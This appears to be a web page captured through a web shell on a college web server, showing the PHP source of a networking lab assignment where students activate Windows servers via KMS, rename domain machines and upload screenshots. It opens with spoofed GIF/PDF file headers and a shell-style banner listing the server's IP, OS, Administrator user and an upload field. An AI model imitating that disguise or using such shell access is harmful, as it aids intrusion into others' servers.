GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/JimMartinson/CST2274/Labs/xLab06.fix/ |
Upload File : |
<? // JimMartinson/CST2274/Labs/Lab06/index.php $TRACK = "<b>".basename(__FILE__).'</b> <span class="pv_fl">('.__FILE__.")</span>\n<ol>\n"; ini_set('include_path',ini_get('include_path').PATH_SEPARATOR.$_SERVER['DOCUMENT_ROOT']."/"); // Add the DOCUMENT_ROOT to the include_path. include('application.phpinc'); $disabled = ''; //$disabled - ' disabled'; require('Gradebook/EvaluationSubmission_BEGIN.phpinc'); // Replaced. require('JimMartinson/CST2274/Labs/GenerateComputerNames.phpinc'); // Includes 'Gradebook/EvaluationSubmission_BEGIN.phpinc'. ?> <style type="text/css">b {white-space:nowrap;}</style> <p> <fieldset><legend><?=$evaluationType?> <?=$evaluationNumber?> Assignment</legend> <? if ( $disabled ) { ?> <span class="error bold">Notice: Do not perform this lab unless this notice has been removed.</span><br> <? } ?> The purpose of this lab is to fix naming errors caused by me. <br><span class="note">Even if your servers and the Windows 10 VMs are named correctly you must perform this lab (submit screenshots) to get credit.</span> <br><?=$gradeNote?> <ol class="count"> <li> Create a directory called <b><?=$evaluationName?></b>. We will use it for all work performed in this lab. </li> <li> Activate your servers via the Ridgewater KMS server. <br>Open a command line as administrator and enter the following: <br><kbd>slmgr.vbs /skms 134.29.168.16:1688</kbd> <note>This will set the KMS host address.</note> <br><kbd>slmgr.vbs /ato</kbd> <note>This will activate the server.</note> </li> <li> Rename your AD/DC <b><?=$serverDescription?></b> to: <b><?=$serverName?></b>. <br>Restart your AD/DC <b><?=$serverDescription?></b>. </li> <li> Open up <b>Control Panel / System and Security / System</b>. This will show your <b>AD/DC <?=$serverDescription?></b> computer name. <br>Take a screenshot and save it as <b><?=$userFileName?>-<?=$evaluationName?>-a.png</b> in your <b><?=$evaluationName?></b> folder. <? showBegin('See example screenshot','Hide example screenshot'); ?><br> <img src="ServerSystem.png" width="818" height="600" alt="AD/DC <?=$serverDescription?> example screenshot"/><br> <? showEnd (); ?> </li> <li> Rename your <b><?=$coreServerDescription?></b> to: <b><?=$coreServerName?></b>. <br>Restart your <b><?=$coreServerDescription?></b>. </li> <li> Open up <b>Control Panel / System and Security / System</b>. This will show your <b><?=$coreServerDescription?></b> computer name. <br>Take a screenshot and save it as <b><?=$userFileName?>-<?=$evaluationName?>-b.png</b> in your <b><?=$evaluationName?></b> folder. <? showBegin('See example screenshot','Hide example screenshot'); ?><br> <img src="CoreSystem.png" width="801" height="602" alt="<?=$coreServerDescription?> example screenshot"/><br> <? showEnd (); ?> </li> <li> Rename your <b><?=$workstationDescription?></b> to: <b><?=$workstationName?></b>. <br>Restart your <b><?=$workstationDescription?></b>. </li> <li> Open up <b>Control Panel / System and Security / System</b>. This will show your <b><?=$workstationDescription?></b> computer name. <br>Take a screenshot and save it as <b><?=$userFileName?>-<?=$evaluationName?>-c.png</b> in your <b><?=$evaluationName?></b> folder. <? showBegin('See example screenshot','Hide example screenshot'); ?><br> <img src="DesktopSystem.png" width="631" height="477" alt="<?=$workstationDescription?> example screenshot"/><br> <? showEnd (); ?> </li> <li> Show the compters in the domain. <br>From your <b><?=$serverDescription?></b> (<?=$serverName?>) server: <br>Open up <b>Server Manager</b>. <br>Click on <b>AD DS</b> from the left menu. <br>Right-click on your <?=$serverName?> server in the <b>SERVERS</b> pane and select <b>Active Diredtory Users and Computers</b>. <br>Expand <b><?=$domainName?></b> from the left pane if it is not already expanded. <br>Click on <b>Computers</b> from the left pane if it is not already selected. This will show computers in your domain. <br>Take a screenshot and save it as <b><?=$userFileName?>-<?=$evaluationName?>-d.png</b> in your <b><?=$evaluationName?></b> folder. <? showBegin('See example screenshot','Hide example screenshot'); ?><br> <img src="AD_Computers.png" width="768" height="361" alt="AD computers example"><br> <? showEnd (); ?> </li> <li>Turn in your assignment: <ol type="a"> <li>Make sure the following files are in your <b><?=$evaluationName?></b> folder. <ol> <li><b><?=$userFileName?>-<?=$evaluationName?>-a.png</b>.</li> <li><b><?=$userFileName?>-<?=$evaluationName?>-b.png</b>.</li> <li><b><?=$userFileName?>-<?=$evaluationName?>-c.png</b>.</li> <li><b><?=$userFileName?>-<?=$evaluationName?>-d.png</b>.</li> </ol> </li> <li>Zip up your <b><?=$evaluationName?></b> folder into a file named <b><?=$uploadFilename?></b>. </li> <li>Browse and select your <b><?=$uploadFilename?></b> file: <input type="file" name="fileUpload" id="inpFileUpload"></li> <li>Then <input type="submit" name="f_subtask" id="inpSubmit" value="Submit"<?=$disabled?>> for grading.<? if ( $disabled ) { ?> <span class="error bold">Notice: Do not perform this lab unless this notice has been removed.</span><? } ?></li> </ol> </li> <? /**/ ?> </ol> <?=$gradeNote?> </fieldset> <? require('Gradebook/EvaluationSubmission_END.phpinc'); // Replaced. if ($TRACK != '') $_SESSION['TRACK'] .= "<li>End ".basename(__FILE__)."</ol>\n"; ?>